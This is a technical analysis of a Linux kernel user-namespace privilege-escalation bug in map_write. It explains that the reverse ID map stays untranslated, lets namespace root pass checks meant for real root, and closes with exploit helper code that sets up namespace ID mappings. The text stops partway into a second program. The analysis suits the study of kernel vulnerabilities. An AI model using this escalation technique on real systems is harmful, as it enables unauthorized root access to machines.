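Introduction

This is a vulnerability in namespaces. The article first covers some basics of user namespaces, then starts from the patch, reads through the source code, and identifies the cause of the bug. Because I am not very familiar with this part of the kernel source, the article concentrates on the source analysis; for everything else, see the links at the end.

All code in this article is based on linux-4.15.4.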

namespace

Linux implements namespaces to isolate different kinds of resources. The idea is to move variables that used to be global into the individual namespaces.

user namespaces

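The Linux man page for user namespaces: overview of Linux user namespaces

A user namespace isolates security-related identifiers and attributes, mainly UIDs, GIDs, the root directory, keys, and capabilities. With user namespaces, a process can have different UIDs and GIDs inside and outside a namespace; for example, it can have root privileges inside the namespace while being unprivileged on the real system.

The man page mentioned above describes two proc files: /proc/<pid>/uid_map and /proc/<pid>/gid_map. Writing to these files maps UIDs or GIDs of the system into the namespace. Each line has three fields:

  • The first field, ID-inside-ns, is the UID or GID as seen inside the container.
  • The second field, ID-outside-ns, is the real UID or GID outside the container that it maps to.
  • The third field is the length of the mapped range; it is usually 1, which gives a one-to-one mapping.

For example, mapping the real uid=1000 to uid=0 inside the container: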

$ cat /proc/2465/uid_map
0       1000          1
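To make the three fields concrete, here is a minimal user-space sketch (not kernel code) that parses one mapping line and translates an in-namespace ID to the outside ID. The names struct id_extent, parse_map_line and inside_to_outside are hypothetical and exist only for this illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* One line of uid_map/gid_map: "ID-inside-ns ID-outside-ns length". */
struct id_extent {
    uint32_t inside_first;   /* first ID as seen inside the namespace */
    uint32_t outside_first;  /* first ID as seen outside the namespace */
    uint32_t count;          /* number of consecutive IDs that are mapped */
};

/* Parse a single mapping line; returns 0 on success, -1 on malformed input. */
int parse_map_line(const char *line, struct id_extent *out)
{
    unsigned int inside, outside, count;

    if (sscanf(line, "%u %u %u", &inside, &outside, &count) != 3)
        return -1;
    out->inside_first = inside;
    out->outside_first = outside;
    out->count = count;
    return 0;
}

/* Translate an in-namespace ID. Returns 0 and stores the outside ID in
 * *result, or returns -1 if the ID is not covered by the extent. */
int inside_to_outside(const struct id_extent *e, uint32_t id, uint32_t *result)
{
    if (id < e->inside_first || id - e->inside_first >= e->count)
        return -1;
    *result = e->outside_first + (id - e->inside_first);
    return 0;
}
```

With the line shown above, ID 0 inside the namespace corresponds to ID 1000 outside it, and every other ID is unmapped.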
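Writes to these two files are subject to some restrictions. Up to and including Linux 4.14 at most 5 lines could be written; since 4.15 the limit is 340 lines.
  • The writing process needs the CAP_SETUID (CAP_SETGID) capability in this user namespace (see Capabilities).
  • The writing process must be either in this user namespace or in its parent user namespace.
  • In addition, one of the following must hold: 1) the written data maps the writing process's effective uid/gid in the parent user namespace into the child user namespace, or 2) the writing process has CAP_SETUID/CAP_SETGID in the parent user namespace, in which case it can map any uid/gid of the parent namespace.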

Patch analysis

The fix for this vulnerability is here; the problem is in map_write in kernel/user_namespace.c:

diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c
index e5222b5..923414a 100644
--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,
     if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
         goto out;

-    ret = sort_idmaps(&new_map);
-    if (ret < 0)
-        goto out;
-
     ret = -EPERM;
     /* Map the lower ids from the parent user namespace to the
      * kernel global id space.
@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,
         e->lower_first = lower_first;
     }

+    /*
+     * If we want to use binary search for lookup, this clones the extent
+     * array and sorts both copies.
+     */
+    ret = sort_idmaps(&new_map);
+    if (ret < 0)
+        goto out;
+
     /* Install the map */
     if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
         memcpy(map->extent, new_map.extent,

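The patch only moves a few lines of code. Before drawing conclusions, let us analyze this function.

Using Understand, find the call graph of this function:

[Figure: call graph of map_write]

Then look at proc_uid_map_write, the function that calls map_write. Its prototype: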

ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
               size_t size, loff_t *ppos)

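The parameters look like those of a file write operation. Searching the source for code related to this function shows that fs/proc/base.c contains a structure that uses proc_uid_map_write: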

static const struct file_operations proc_uid_map_operations = {
    .open        = proc_uid_map_open,
    .write        = proc_uid_map_write,
    .read        = seq_read,
    .llseek        = seq_lseek,
    .release    = proc_id_map_release,
};

This confirms that it is a file operation. The same file also contains the following line:

REG("uid_map",    S_IRUGO|S_IWUSR, proc_uid_map_operations)

So this is presumably the implementation of the write operation on /proc/<pid>/uid_map.

Source code analysis

Back to the vulnerable source. The analysis starts with proc_uid_map_write, the first function reached by a write to the file:

ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
               size_t size, loff_t *ppos)
{
    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct user_namespace *seq_ns = seq_user_ns(seq);

    if (!ns->parent)
        return -EPERM;

    if ((seq_ns != ns) && (seq_ns != ns->parent))
        return -EPERM;

    return map_write(file, buf, size, ppos, CAP_SETUID,
             &ns->uid_map, &ns->parent->uid_map);
}

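It only performs two checks and then calls map_write. The last two arguments of map_write are the uid_map of this namespace and the uid_map of its parent namespace. (From the basics of namespaces: a new namespace is created by cloning a new process and passing specific flags.)

Look at the definition of these maps. The definition of uid_gid_extent matches the format of /proc/<pid>/uid_map and the related files exactly. The user_namespaces man page also says that several lines can be written to these files at once: up to and including Linux 4.14 the limit was (arbitrarily) set at 5 lines, and since Linux 4.15 it is 340 lines. With that, the two structures below are easy to understand: with at most 5 lines the data is stored directly in extent, and with more than 5 lines it is stored in the memory that forward points to: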

#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340

struct uid_gid_extent {
    u32 first;
    u32 lower_first;
    u32 count;
};

struct uid_gid_map { /* 64 bytes -- 1 cache line */
    u32 nr_extents;
    union {
        struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS];
        struct {
            struct uid_gid_extent *forward;
            struct uid_gid_extent *reverse;
        };
    };
};

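The first part of map_write is now easy to follow. For the capability checks, refer to the explanation in the man page. Apart from a few argument checks, the important piece is kbuf: memdup_user_nul allocates a block of kernel memory, copies the data written from user space into it, and kbuf ends up pointing to that memory.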

    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct uid_gid_map new_map;
    unsigned idx;
    struct uid_gid_extent extent;
    char *kbuf = NULL, *pos, *next_line;
    ssize_t ret = -EINVAL;
    memset(&new_map, 0, sizeof(struct uid_gid_map));

    ret = -EPERM;
    /* Only allow one successful write to the map */
    if (map->nr_extents != 0)
        goto out;

    /*
     * Adjusting namespace settings requires capabilities on the target.
     */
    if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN))
        goto out;

    /* Only allow < page size writes at the beginning of the file */
    ret = -EINVAL;
    if ((*ppos != 0) || (count >= PAGE_SIZE))
        goto out;

    /* Slurp in the user data */
    // copy the data written from user space into kbuf
    kbuf = memdup_user_nul(buf, count);
    if (IS_ERR(kbuf)) {
        ret = PTR_ERR(kbuf);
        kbuf = NULL;
        goto out;
    }

    /* Parse the user data */
    ret = -EINVAL;
    pos = kbuf;

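Next comes a large loop that parses the user input line by line into extent and then calls two key functions, mappings_overlap and insert_extent. mappings_overlap checks whether a uid_gid_extent overlaps anything already in the uid_gid_map and returns true if it does; insert_extent inserts a uid_gid_extent into the uid_gid_map.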

    for (; pos; pos = next_line) {

        /* Find the end of line and ensure I don't look past it */
        next_line = strchr(pos, '\n');
        if (next_line) {
            *next_line = '\0';
            next_line++;
            if (*next_line == '\0')
                next_line = NULL;
        }

        pos = skip_spaces(pos);
        extent.first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.lower_first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.count = simple_strtoul(pos, &pos, 10);
        if (*pos && !isspace(*pos))
            goto out;

        /* Verify there is not trailing junk on the line */
        pos = skip_spaces(pos);
        if (*pos != '\0')
            goto out;

        /* Verify we have been given valid starting values */
        if ((extent.first == (u32) -1) ||
            (extent.lower_first == (u32) -1))
            goto out;

        /* Verify count is not zero and does not cause the
         * extent to wrap
         */
        if ((extent.first + extent.count) <= extent.first)
            goto out;
        if ((extent.lower_first + extent.count) <=
             extent.lower_first)
            goto out;

        /* Do the ranges in extent overlap any previous extents? */
        if (mappings_overlap(&new_map, &extent))
            goto out;

        if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS &&
            (next_line != NULL))
            goto out;

        ret = insert_extent(&new_map, &extent);
        if (ret < 0)
            goto out;
        ret = -EINVAL;
    }
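The check "(first + count) <= first" in the loop above rejects a zero count and a wrapping range in a single comparison. The following user-space sketch shows why, using 32-bit unsigned arithmetic; range_is_sane is a hypothetical name, not a kernel function.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Mirrors the kernel's test "(first + count) <= first" with 32-bit
 * unsigned arithmetic. The sum wraps modulo 2^32, so both a zero count
 * (sum == first) and a range running past 0xFFFFFFFF (sum < first)
 * fail the check.
 */
bool range_is_sane(uint32_t first, uint32_t count)
{
    uint32_t end = first + count;   /* unsigned overflow wraps by definition */

    return end > first;
}
```

For example, first = 0xFFFFFFF0 with count = 0x10 wraps to 0 and is rejected, while count = 0xF ends at 0xFFFFFFFF and is accepted.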

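Here is the implementation of the two key functions just mentioned. mappings_overlap walks the uid_gid_map, takes each uid_gid_extent, and compares it with extent, checking both the upper (in-namespace) range and the lower (parent) range. Note also that when nr_extents is greater than 5, the entries are read from the array that forward points to.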

static bool mappings_overlap(struct uid_gid_map *new_map,
                 struct uid_gid_extent *extent)
{
    u32 upper_first, lower_first, upper_last, lower_last;
    unsigned idx;

    upper_first = extent->first;
    lower_first = extent->lower_first;
    upper_last = upper_first + extent->count - 1;
    lower_last = lower_first + extent->count - 1;

    for (idx = 0; idx < new_map->nr_extents; idx++) {
        u32 prev_upper_first, prev_lower_first;
        u32 prev_upper_last, prev_lower_last;
        struct uid_gid_extent *prev;

        if (new_map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            prev = &new_map->extent[idx];
        else
            prev = &new_map->forward[idx];

        prev_upper_first = prev->first;
        prev_lower_first = prev->lower_first;
        prev_upper_last = prev_upper_first + prev->count - 1;
        prev_lower_last = prev_lower_first + prev->count - 1;

        /* Does the upper range intersect a previous extent? */
        if ((prev_upper_first <= upper_last) &&
            (prev_upper_last >= upper_first))
            return true;

        /* Does the lower range intersect a previous extent? */
        if ((prev_lower_first <= lower_last) &&
            (prev_lower_last >= lower_first))
            return true;
    }
    return false;
}
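The two if statements in mappings_overlap are the usual closed-interval intersection test, applied once to the upper ranges and once to the lower ranges. A minimal stand-alone sketch of that test follows; ranges_intersect is a hypothetical helper, and both counts are assumed to be non-zero and non-wrapping, as the earlier checks in map_write guarantee.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * True if [a_first, a_first + a_count - 1] and
 * [b_first, b_first + b_count - 1] share at least one ID.
 * Assumes both counts are non-zero and neither range wraps.
 */
bool ranges_intersect(uint32_t a_first, uint32_t a_count,
                      uint32_t b_first, uint32_t b_count)
{
    uint32_t a_last = a_first + a_count - 1;
    uint32_t b_last = b_first + b_count - 1;

    return a_first <= b_last && a_last >= b_first;
}
```

Adjacent ranges such as 0..9 and 10..14 do not intersect, which is why a mapping like "0 0 1", "1 1 1", ... passes the overlap check.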

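Next, insert_extent. It starts with one large if: when the inline array is full (nr_extents equals 5), it allocates memory for 340 extents, copies the existing entries into it, and makes forward point to it. The new extent is then copied into the next free slot and nr_extents is incremented.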

static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent)
{
    struct uid_gid_extent *dest;

    if (map->nr_extents == UID_GID_MAP_MAX_BASE_EXTENTS) {
        struct uid_gid_extent *forward;

        /* Allocate memory for 340 mappings. */
        forward = kmalloc(sizeof(struct uid_gid_extent) *
                 UID_GID_MAP_MAX_EXTENTS, GFP_KERNEL);
        if (!forward)
            return -ENOMEM;

        /* Copy over memory. Only set up memory for the forward pointer.
         * Defer the memory setup for the reverse pointer.
         */
        memcpy(forward, map->extent,
               map->nr_extents * sizeof(map->extent[0]));

        map->forward = forward;
        map->reverse = NULL;
    }

    if (map->nr_extents < UID_GID_MAP_MAX_BASE_EXTENTS)
        dest = &map->extent[map->nr_extents];
    else
        dest = &map->forward[map->nr_extents];

    *dest = *extent;
    map->nr_extents++;
    return 0;
}
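The spill from inline storage to the heap can be reproduced in user space. The sketch below is a simplified model of the same idea, with malloc standing in for kmalloc; struct model_map, model_extent_at and model_insert are hypothetical names, and the anonymous struct inside the union requires C11.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BASE_EXTENTS 5     /* inline capacity, same value as the kernel */
#define MAX_EXTENTS  340   /* heap capacity, same value as the kernel */

struct extent { uint32_t first, lower_first, count; };

struct model_map {
    uint32_t nr_extents;
    union {
        struct extent inline_ext[BASE_EXTENTS];
        struct { struct extent *forward, *reverse; };
    };
};

/* Returns a pointer to extent idx, wherever it currently lives. */
struct extent *model_extent_at(struct model_map *m, uint32_t idx)
{
    return m->nr_extents <= BASE_EXTENTS ? &m->inline_ext[idx]
                                         : &m->forward[idx];
}

/* Appends one extent; returns 0 on success, -1 if full or out of memory. */
int model_insert(struct model_map *m, const struct extent *e)
{
    if (m->nr_extents >= MAX_EXTENTS)
        return -1;

    if (m->nr_extents == BASE_EXTENTS) {
        /* Inline array is full: move everything to the heap. */
        struct extent *heap = malloc(sizeof(*heap) * MAX_EXTENTS);

        if (!heap)
            return -1;
        memcpy(heap, m->inline_ext, BASE_EXTENTS * sizeof(*heap));
        m->forward = heap;   /* overwrites the inline storage */
        m->reverse = NULL;   /* filled in later, when sorting */
    }

    if (m->nr_extents < BASE_EXTENTS)
        m->inline_ext[m->nr_extents] = *e;
    else
        m->forward[m->nr_extents] = *e;
    m->nr_extents++;
    return 0;
}
```

Because forward and reverse share memory with the inline array, the copy to the heap has to happen before the pointers are written.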

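Back to map_write. Everything so far copies the input and performs checks, and the parsed input ends up in new_map. new_idmap_permitted is skipped here; it can be understood with the help of the capability rules for user namespaces. The next function is sort_idmaps.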

    if (new_map.nr_extents == 0)
        goto out;

    ret = -EPERM;
    /* Validate the user is allowed to use user id's mapped to. */
    if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
        goto out;

    ret = sort_idmaps(&new_map);
    if (ret < 0)
        goto out;

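sort_idmaps is a sorting function, and it only sorts when there are more than 5 extents. It also uses kmemdup to make a second copy, sorts that copy for reverse lookups (by lower_first), and stores the result in reverse. As seen in insert_extent above, reverse was initialized to NULL.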

static int sort_idmaps(struct uid_gid_map *map)
{
    if (map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        return 0;

    /* Sort forward array. */
    sort(map->forward, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_forward, NULL);

    /* Only copy the memory from forward we actually need. */
    map->reverse = kmemdup(map->forward,
                   map->nr_extents * sizeof(struct uid_gid_extent),
                   GFP_KERNEL);
    if (!map->reverse)
        return -ENOMEM;

    /* Sort reverse array. */
    sort(map->reverse, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_reverse, NULL);

    return 0;
}
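As a rough user-space analogue of sort_idmaps, the sketch below sorts one array by first and a heap copy by lower_first, using qsort and malloc in place of the kernel's sort and kmemdup. The function and comparator names are hypothetical.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct extent { uint32_t first, lower_first, count; };

/* Order by the in-namespace start (for namespace -> kernel lookups). */
static int by_first(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;

    return (x->first > y->first) - (x->first < y->first);
}

/* Order by the parent-side start (for kernel -> namespace lookups). */
static int by_lower_first(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;

    return (x->lower_first > y->lower_first) -
           (x->lower_first < y->lower_first);
}

/*
 * Sorts fwd in place by first and returns a heap copy sorted by
 * lower_first, or NULL if the allocation fails. The caller frees it.
 */
struct extent *sort_both_ways(struct extent *fwd, size_t n)
{
    struct extent *rev;

    qsort(fwd, n, sizeof(*fwd), by_first);

    rev = malloc(n * sizeof(*rev));
    if (!rev)
        return NULL;
    memcpy(rev, fwd, n * sizeof(*rev));
    qsort(rev, n, sizeof(*rev), by_lower_first);
    return rev;
}
```

The important property is that the copy is a snapshot: whatever the forward array contains at the moment of the call is what the reverse array will hold from then on.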

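Next, map_write iterates over the input and calls map_id_range_down. The first argument is the parent namespace's uid_gid_map that map_write received; the second and third arguments are the second and third fields of each written line, i.e. the start and the length of the range in the parent namespace.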

    /* Map the lower ids from the parent user namespace to the
     * kernel global id space.
     */
    for (idx = 0; idx < new_map.nr_extents; idx++) {
        struct uid_gid_extent *e;
        u32 lower_first;

        if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            e = &new_map.extent[idx];
        else
            e = &new_map.forward[idx];

        lower_first = map_id_range_down(parent_map,
                        e->lower_first,
                        e->count);

        /* Fail if we can not map the specified extent to
         * the kernel global id space.
         */
        if (lower_first == (u32) -1)
            goto out;

        e->lower_first = lower_first;
    }

Now look at map_id_range_down:

static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count)
{
    struct uid_gid_extent *extent;
    unsigned extents = map->nr_extents;
    smp_rmb();

    if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        extent = map_id_range_down_base(extents, map, id, count);
    else
        extent = map_id_range_down_max(extents, map, id, count);

    /* Map the id or note failure */
    if (extent)
        id = (id - extent->first) + extent->lower_first;
    else
        id = (u32) -1;

    return id;
}

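map_id_range_down_max, which is used when the map holds more than five extents, is a thin wrapper around a binary search. Recall that the second field of the user input is the start of the range in the parent namespace to be mapped. The function binary-searches the parent namespace's map for a uid_gid_extent whose [first, first+count-1] contains the range that the child namespace wants to map.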

/**
 * map_id_range_down_max - Find idmap via binary search in ordered idmap array.
 * Can only be called if number of mappings exceeds UID_GID_MAP_MAX_BASE_EXTENTS.
 */
static struct uid_gid_extent *
map_id_range_down_max(unsigned extents, struct uid_gid_map *map, u32 id, u32 count)
{
    struct idmap_key key;

    key.map_up = false;
    key.count = count;
    key.id = id;

    return bsearch(&key, map->forward, extents,
               sizeof(struct uid_gid_extent), cmp_map_id);
}
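The lookup can be imitated in user space with the standard bsearch. The comparator below is a simplified sketch modeled on the idea of cmp_map_id for the "down" direction only; it is not the kernel's code, the names are hypothetical, and it assumes that neither the key range nor any extent wraps around.

```c
#include <stdint.h>
#include <stdlib.h>

struct extent { uint32_t first, lower_first, count; };
struct range_key { uint32_t id, count; };

/* Returns 0 when [id, id + count - 1] lies entirely inside the extent,
 * a negative value when the key starts before it, positive otherwise. */
static int cmp_range(const void *k, const void *e)
{
    const struct range_key *key = k;
    const struct extent *el = e;
    uint32_t id_last = key->id + key->count - 1;
    uint32_t last = el->first + el->count - 1;

    if (key->id >= el->first && id_last <= last)
        return 0;
    if (key->id < el->first)
        return -1;
    return 1;
}

/*
 * Translates the start of [id, id + count - 1] through a map that is
 * sorted by first. Returns (uint32_t)-1 if no single extent contains
 * the whole range.
 */
uint32_t range_down(const struct extent *sorted, size_t n,
                    uint32_t id, uint32_t count)
{
    struct range_key key = { id, count };
    const struct extent *hit =
        bsearch(&key, sorted, n, sizeof(*sorted), cmp_range);

    return hit ? (id - hit->first) + hit->lower_first : (uint32_t)-1;
}
```

A range that straddles two extents is reported as unmapped, which matches the requirement that a single parent extent must cover the whole requested range.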

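Back in map_id_range_down: once the uid_gid_extent has been found, it is used to update id, which is then returned. Looking back at the caller, this id is the lower_first field of a uid_gid_extent in the child namespace, i.e. the start of the range in the parent namespace to be mapped. The statement below converts id through the parent's extent into what the parent's map refers to. Since all namespaces are nested step by step from a single root namespace, and each map was translated in the same way when it was written, the value ultimately denotes a UID of the whole system (the kernel global ID space).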

id = (id - extent->first) + extent->lower_first;

Finally, back in map_write, the end of the for loop uses the following statement to update the lower_first field of the corresponding uid_gid_extent in new_map:

e->lower_first = lower_first;

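The last part of map_write is essentially a write-back. map_write receives a map parameter which, as proc_uid_map_write shows, is the uid_gid_map of the current namespace, while new_map is freshly built. This part installs new_map into map (the proc file can be written only once and is empty initially) and finishes with some error handling.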

    /* Install the map */
    if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
        memcpy(map->extent, new_map.extent,
               new_map.nr_extents * sizeof(new_map.extent[0]));
    } else {
        map->forward = new_map.forward;
        map->reverse = new_map.reverse;
    }
    smp_wmb();
    map->nr_extents = new_map.nr_extents;

    *ppos = count;
    ret = count;
out:
    if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) {
        kfree(new_map.forward);
        kfree(new_map.reverse);
        map->forward = NULL;
        map->reverse = NULL;
        map->nr_extents = 0;
    }

    mutex_unlock(&userns_state_mutex);
    kfree(kbuf);
    return ret;

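Vulnerability analysis

In sort_idmaps above, when there are more than 5 entries a copy, reverse, is created and sorted. It is never modified after that, and in the end its address is assigned to map.

Compare the two sort orders: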

static int cmp_extents_forward(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->first < e2->first)
        return -1;

    if (e1->first > e2->first)
        return 1;

    return 0;
}

/* cmp function to sort() reverse mappings */
static int cmp_extents_reverse(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->lower_first < e2->lower_first)
        return -1;

    if (e1->lower_first > e2->lower_first)
        return 1;

    return 0;
}

forward is sorted by the first field of the uid_gid_extent entries in the uid_gid_map, whereas reverse is sorted by the lower_first field.

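In the for loop that calls map_id_range_down, e->lower_first is updated, and e is looked up through forward. So only the values in forward are updated; the values in reverse are left unchanged, which means reverse still holds exactly what the user wrote. Suppose a namespace n1 maps its root onto an unprivileged user of the kernel, and n1 then creates a namespace n2 and maps n1's root onto n2's root, using more than five extents so that forward and reverse are in use. In n2's uid_map, the second field (lower_first) of the uid_gid_extent entries that forward points to has been translated, but the entries that reverse points to have not and still describe a root-to-root mapping. Any UID decision made through reverse therefore leads to a privilege escalation.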
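The effect of the ordering can be reproduced with a small user-space model. The sketch below is an illustration under simplifying assumptions, not the kernel code: the parent namespace n1 is hard-coded to map its IDs 0..999 onto kernel IDs 100000..100999, the six-line input is the one used by the exploit later in this article, and all names are hypothetical. The forward sort is omitted because the input is already ordered by first.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAP_LINES 6

struct extent { uint32_t first, lower_first, count; };

static int by_lower_first(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;

    return (x->lower_first > y->lower_first) -
           (x->lower_first < y->lower_first);
}

/* Assumed parent map (n1): IDs 0..999 -> kernel IDs 100000..100999. */
static uint32_t parent_down(uint32_t id)
{
    return id < 1000 ? 100000 + id : (uint32_t)-1;
}

static void clone_and_sort(struct extent *rev, const struct extent *fwd)
{
    memcpy(rev, fwd, MAP_LINES * sizeof(*rev));
    qsort(rev, MAP_LINES, sizeof(*rev), by_lower_first);
}

/*
 * Builds n2's map into fwd[] and rev[]. A non-zero clone_before_translate
 * models the vulnerable order (copy made before the translation loop);
 * zero models the patched order (copy made after it).
 */
void model_map_write(struct extent *fwd, struct extent *rev,
                     int clone_before_translate)
{
    static const struct extent input[MAP_LINES] = {
        {0, 0, 1}, {1, 1, 1}, {2, 2, 1}, {3, 3, 1}, {4, 4, 1}, {5, 5, 995}
    };
    int i;

    memcpy(fwd, input, sizeof(input));

    if (clone_before_translate)
        clone_and_sort(rev, fwd);

    /* Translate lower_first from n1's ID space to kernel IDs. */
    for (i = 0; i < MAP_LINES; i++)
        fwd[i].lower_first = parent_down(fwd[i].lower_first);

    if (!clone_before_translate)
        clone_and_sort(rev, fwd);
}
```

In the vulnerable order, fwd[0].lower_first becomes 100000 while rev[0].lower_first stays 0, so the reverse array claims that kernel UID 0 is mapped into n2. In the patched order both arrays agree.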

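The remaining question is where the reverse array is actually used, and what for.

According to the author of the report, the references to reverse in user_namespace.c show that it is used directly by from_kuid(), which kuid_has_mapping() relies on to decide whether an ID is mapped; the latter in turn is used by permission checks such as inode_owner_or_capable() and privileged_wrt_inode_uidgid().
For how kuid_has_mapping() is used, the implementation of unshare is a good reference. Starting from the unshare system call handler, the call chain is:
1. kernel/fork.c: SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)
2. kernel/user_namespace.c: unshare_userns
3. kernel/user_namespace.c: create_user_ns
4. kuid_has_mapping (called from create_user_ns)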
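To see why a stale reverse array matters for these checks, consider a user-space model of the kernel-to-namespace direction. This is a sketch with hypothetical names; it uses a linear scan for brevity, and it assumes, in line with the description above, that "has a mapping" means the translation does not yield (uint32_t)-1.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct extent { uint32_t first, lower_first, count; };

/*
 * Kernel ID -> namespace ID through the reverse array.
 * Returns (uint32_t)-1 when the kernel ID is not mapped.
 */
uint32_t model_from_kuid(const struct extent *reverse, size_t n, uint32_t kid)
{
    size_t i;

    for (i = 0; i < n; i++) {
        const struct extent *e = &reverse[i];

        if (kid >= e->lower_first && kid - e->lower_first < e->count)
            return e->first + (kid - e->lower_first);
    }
    return (uint32_t)-1;
}

/* An ID "has a mapping" if the translation above succeeds. */
bool model_kuid_has_mapping(const struct extent *reverse, size_t n,
                            uint32_t kid)
{
    return model_from_kuid(reverse, n, kid) != (uint32_t)-1;
}
```

With a correct reverse entry {0, 100000, 1}, kernel UID 0 has no mapping in the namespace. With the stale entry {0, 0, 1}, kernel UID 0 appears to be mapped, so checks built on this answer treat files owned by the real root as belonging to the namespace.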

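Exploit code

Finally, here is the exploit code. The first part is subuid_shell.c, an ordinary program that uses unshare to create a new user namespace. The main flow is:

1. The parent forks a child; the child calls unshare to create a new user namespace while the parent waits.

2. Once the namespace exists, the child waits and the parent sets up the mappings by writing setgroups and running newuidmap and newgidmap.

3. The parent waits, and the child calls setgid(0) and setuid(0) and then executes bash.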

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace process with bash shell, in which you will see "root",
        // as the setuid(0) call worked
        // this might seem a little confusing, but you are "root" only to this child ns,
        // thus, no permission to the outside ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // set id mapping (0..1000) for child process
    char cmd[1000];
    sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}
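The synchronization between the two processes is a two-step handshake over a socketpair. The sketch below isolates just that pattern, with the namespace-specific work replaced by comments; handshake_demo is a hypothetical name and the function only reports whether the handshake completed.

```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 0 if both sides complete the handshake, -1 otherwise. */
int handshake_demo(void)
{
    int sv[2];
    int status;
    int result = -1;
    char c;
    pid_t child;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv))
        return -1;

    child = fork();
    if (child == -1) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }

    if (child == 0) {
        close(sv[1]);
        /* Step 1: child-side setup (unshare in the exploit). */
        if (write(sv[0], "X", 1) != 1)      /* tell the parent we are ready */
            _exit(1);
        if (read(sv[0], &c, 1) != 1)        /* wait for the parent's setup */
            _exit(1);
        /* Step 3: child continues (setuid/exec in the exploit). */
        _exit(0);
    }

    close(sv[0]);
    if (read(sv[1], &c, 1) == 1) {          /* wait until the child is ready */
        /* Step 2: parent-side setup (writing the ID maps in the exploit). */
        if (write(sv[1], "X", 1) == 1)      /* release the child */
            result = 0;
    }
    close(sv[1]);

    if (waitpid(child, &status, 0) != child)
        return -1;
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return result;
}
```

The ordering matters because the ID maps of the new namespace can only be written after unshare has created it, and the child must not call setuid before the maps exist.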

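Next is subshell.c. The flow is the same as above; only the mapping data differs, and this time the parent writes it directly into uid_map and gid_map. Why this particular data is used follows from the vulnerability analysis above.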

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    // create a child process
    pid_t child = fork();
    if (child == -1)
